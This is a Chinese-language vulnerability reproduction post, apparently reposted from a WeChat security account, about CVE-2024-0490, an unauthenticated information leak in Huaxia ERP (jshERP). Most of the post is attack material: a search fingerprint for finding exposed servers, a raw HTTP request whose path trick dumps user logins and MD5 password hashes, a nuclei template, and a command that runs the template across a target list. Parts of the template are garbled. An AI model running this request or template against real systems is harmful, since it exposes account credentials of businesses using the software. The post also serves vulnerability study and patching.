免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
福利:小编整理了大量电子书和护网常用工具,在文末免费获取。
01
—
漏洞名称
华夏ERP getAllList信息泄露漏洞
02
—
漏洞影响
华夏ERP < 3.2版本
官网
https://www.huaxiaerp.com/
github
https://github.com/jishenghua/jshERP
03
—
漏洞描述
华夏ERP基于SpringBoot框架和SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。主要模块有零售管理、采购管理、销售管理、仓库管理、财务管理、报表查询、系统管理等。支持预付款、收入支出、仓库调拨、组装拆卸、订单等特色功能。拥有库存状况、出入库统计等报表。同时对角色和权限进行了细致全面控制,精确到每个按钮和菜单。该系统存在信息泄露漏洞,攻击者可以通过特定ULR获取系统账号密码。
04
—
body="jshERP-boot"
05
—
靶场搭建
官方有教程,我直接把地址粘贴过来,但记得下载版本< 3.2
需要用户手册请访问这里
https://www.huaxiaerp.com/thread-393-1-1.html
喜欢视频教程可以看这里
https://space.bilibili.com/540003552/channel/series
为方便大家搭建运行环境,分享了下载地址
https://pan.baidu.com/s/1jlild9uyGdQ7H2yaMx76zw 提取码:814g
不会打包的小伙伴,请下载此打包后的文件
https://share.weiyun.com/NDJNLhry 密码:vd3aig
不会部署的小伙伴,请参考部署教程
http://www.huaxiaerp.com/thread-177-1-1.html
部署后登录系统的默认租户账号:jsh,默认超管账户:admin,默认密码均为:123456
06
—
漏洞复现
向靶场发送如下数据包
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip
漏洞复现成功
返回body中loginName为用户名,password是MD5加密
07
—
nuclei poc
poc文件内容如下
id: CVE-2024-0490
info:
name: 华夏ERP getAllList信息泄露漏洞
author: fgz
severity: high
description: '华夏ERP基于SpringBoot框架和SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。主要模块有零售管理、采购管理、销售管理、仓库管理、财务管理、报表查询、系统管理等。支持预付款、收入支出、仓库调拨、组装拆卸、订单等特色功能。拥有库存状况、出入库统计等报表。同时对角色和权限进行了细致全面控制,精确到每个按钮和菜单。该系统存在信息泄露漏洞,攻击者可以通过特定ULR获取系统账号密码。'
reference:
https://github.com/laoquanshi/puppy/blob/main/Logic%20loopholes%20in%20Huaxia%20ERP%20can%20lead%20to%20unauthorized%20access.md
https://vuldb.com/?ctiid.250595
classification:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N :
5.3 :
CVE-2024-0490 :
CWE-200 :
metadata:
3 :
body="jshERP-boot" :
verified: true
tags: cve,cve2024,leak,jshERP
http:
method: GET
path:
"{{BaseURL}}/jshERP-boot/user/a.ico/../getAllList"
headers:
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
"Windows" :
matchers:
type: word
words:
"username"
"password"
"loginName"
condition: and
extractors:
type: json
part: body
json:
".data.userList"
运行POC
nuclei.exe -t mypoc华夏erpCVE-2024-0490.yaml -l datahuaxia-erp.txt
POC直接打印出关键信息了
08
—
修复建议
升级到最新版本。
09
—
原文始发于微信公众号(AI与网安):[漏洞复现]CVE-2024-0490
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论